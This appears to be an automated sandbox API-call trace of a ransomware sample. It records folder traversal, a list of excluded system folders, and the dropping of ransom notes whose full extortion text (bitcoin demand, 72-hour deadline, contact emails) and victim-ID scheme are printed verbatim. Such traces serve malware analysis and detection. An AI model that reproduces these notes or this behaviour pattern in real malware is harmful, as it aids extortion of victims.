	[0170.462] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f1e920a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7f1e920a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7f1e920a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0170.462] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972f07a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pending.GRL", cAlternateFileName="")) returned 1
	[0170.514] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972f07a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pending.GRL", cAlternateFileName="")) returned 0
	[0170.514] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0170.514] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0170.515] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFramework", cAlternateFileName="NETFRA~1")) returned 1
	[0170.515] lstrcmpW (lpString1="NetFramework", lpString2="..") returned 1
	[0170.515] lstrcmpW (lpString1="NetFramework", lpString2=".") returned 1
	[0170.515] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft"
	[0170.515] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\") returned="C:\\Users\\All Users\\Microsoft\\"
	[0170.515] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\", lpString2="NetFramework" | out: lpString1="C:\\Users\\All Users\\Microsoft\\NetFramework") returned="C:\\Users\\All Users\\Microsoft\\NetFramework"
	[0170.515] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\NetFramework" | out: lpString1="C:\\Users\\All Users\\Microsoft\\NetFramework") returned="C:\\Users\\All Users\\Microsoft\\NetFramework"
	[0170.515] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\NetFramework", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\NetFramework\\") returned="C:\\Users\\All Users\\Microsoft\\NetFramework\\"
	[0170.516] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\Microsoft\\NetFramework\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\NetFramework\\") returned="C:\\Users\\All Users\\Microsoft\\NetFramework\\"
	[0170.516] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\NetFramework\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\NetFramework\\*.*") returned="C:\\Users\\All Users\\Microsoft\\NetFramework\\*.*"
	[0170.516] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\NetFramework\\*.*" (normalized: "c:\\users\\all users\\microsoft\\netframework\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0170.516] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\NetFramework\\*.*") returned 45
	[0170.517] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0170.517] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\NetFramework\\*.*", cchLength=0x2d | out: lpsz="c:\\users\\all users\\microsoft\\netframework\\*.*") returned 0x2d
	[0170.517] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.517] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="windows") returned 0x0
	[0170.517] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.517] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="boot") returned 0x0
	[0170.518] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.518] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="system volume information") returned 0x0
	[0170.518] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.518] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0170.518] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.518] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="temp") returned 0x0
	[0170.518] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.519] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="program files") returned 0x0
	[0170.519] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.519] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="program files (x86)") returned 0x0
	[0170.519] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.519] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="appdata") returned 0x0
	[0170.519] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.520] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="application data") returned 0x0
	[0170.520] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.520] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="winnt") returned 0x0
	[0170.520] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.520] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="tmp") returned 0x0
	[0170.520] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.520] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="cache") returned 0x0
	[0170.521] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.521] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="temporary internet files") returned 0x0
	[0170.521] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.521] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="webcache") returned 0x0
	[0170.521] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.521] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="inetcache") returned 0x0
	[0170.521] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.522] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="nvidia") returned 0x0
	[0170.522] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.522] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="packages") returned 0x0
	[0170.522] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.522] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="cookies") returned 0x0
	[0170.522] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.523] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="programdata") returned 0x0
	[0170.523] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0170.523] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BreadcrumbStore", cAlternateFileName="BREADC~1")) returned 1
	[0170.523] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BreadcrumbStore", cAlternateFileName="BREADC~1")) returned 0
	[0170.523] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0170.523] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0170.524] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\NetFramework" | out: lpString1="C:\\Users\\All Users\\Microsoft\\NetFramework") returned="C:\\Users\\All Users\\Microsoft\\NetFramework"
	[0170.524] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\NetFramework", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\NetFramework\\*.*") returned="C:\\Users\\All Users\\Microsoft\\NetFramework\\*.*"
	[0170.524] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0170.525] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0170.525] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\NetFramework\\HELP_DECRYPT_YOUR_FILES.TXT") returned 69
	[0170.525] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\NetFramework\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\netframework\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0170.526] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0170.526] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0170.531] CloseHandle (hObject=0x384) returned 1
	[0170.532] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0170.532] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0170.533] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0170.535] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0170.535] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\NetFramework\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\netframework\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0170.535] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0170.535] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0170.535] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0170.536] CloseHandle (hObject=0x384) returned 1
	[0170.536] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0170.536] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0170.537] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0170.537] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\NetFramework\\HELP_DECRYPT_YOUR_FILES.HTML") returned 70
	[0170.537] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\NetFramework\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\netframework\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0170.541] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0170.541] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0170.544] CloseHandle (hObject=0x384) returned 1
	[0170.545] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0170.545] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0170.546] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0170.546] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0170.547] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0170.547] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\NetFramework\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\netframework\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0170.547] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0170.548] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0170.548] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0170.548] CloseHandle (hObject=0x384) returned 1
	[0170.548] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\NetFramework\\*.*" (normalized: "c:\\users\\all users\\microsoft\\netframework\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7f2f3dbe, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0170.549] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\NetFramework\\*.*") returned 45
	[0170.549] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0170.549] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\NetFramework\\*.*", cchLength=0x2d | out: lpsz="c:\\users\\all users\\microsoft\\netframework\\*.*") returned 0x2d
	[0170.549] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.549] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="windows") returned 0x0
	[0170.549] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.550] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="boot") returned 0x0
	[0170.550] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.550] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="system volume information") returned 0x0
	[0170.550] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.550] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0170.550] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.550] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="temp") returned 0x0
	[0170.550] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.551] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="program files") returned 0x0
	[0170.551] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.551] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="program files (x86)") returned 0x0
	[0170.551] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.551] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="appdata") returned 0x0
	[0170.551] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.551] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="application data") returned 0x0
	[0170.552] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.552] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="winnt") returned 0x0
	[0170.552] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.552] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="tmp") returned 0x0
	[0170.552] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.552] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="cache") returned 0x0
	[0170.552] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.553] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="temporary internet files") returned 0x0
	[0170.553] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.553] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="webcache") returned 0x0
	[0170.553] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.553] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="inetcache") returned 0x0
	[0170.553] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.553] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="nvidia") returned 0x0
	[0170.553] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.554] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="packages") returned 0x0
	[0170.554] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.554] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="cookies") returned 0x0
	[0170.554] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.554] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\netframework\\*.*", lpSrch="programdata") returned 0x0
	[0170.554] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0170.554] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0170.554] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7f2f3dbe, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0170.555] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0170.555] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BreadcrumbStore", cAlternateFileName="BREADC~1")) returned 1
	[0170.555] lstrcmpW (lpString1="BreadcrumbStore", lpString2="..") returned 1
	[0170.555] lstrcmpW (lpString1="BreadcrumbStore", lpString2=".") returned 1
	[0170.555] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\NetFramework" | out: lpString1="C:\\Users\\All Users\\Microsoft\\NetFramework") returned="C:\\Users\\All Users\\Microsoft\\NetFramework"
	[0170.555] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\NetFramework", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\NetFramework\\") returned="C:\\Users\\All Users\\Microsoft\\NetFramework\\"
	[0170.555] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\NetFramework\\", lpString2="BreadcrumbStore" | out: lpString1="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore") returned="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore"
	[0170.555] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore" | out: lpString1="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore") returned="C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore"
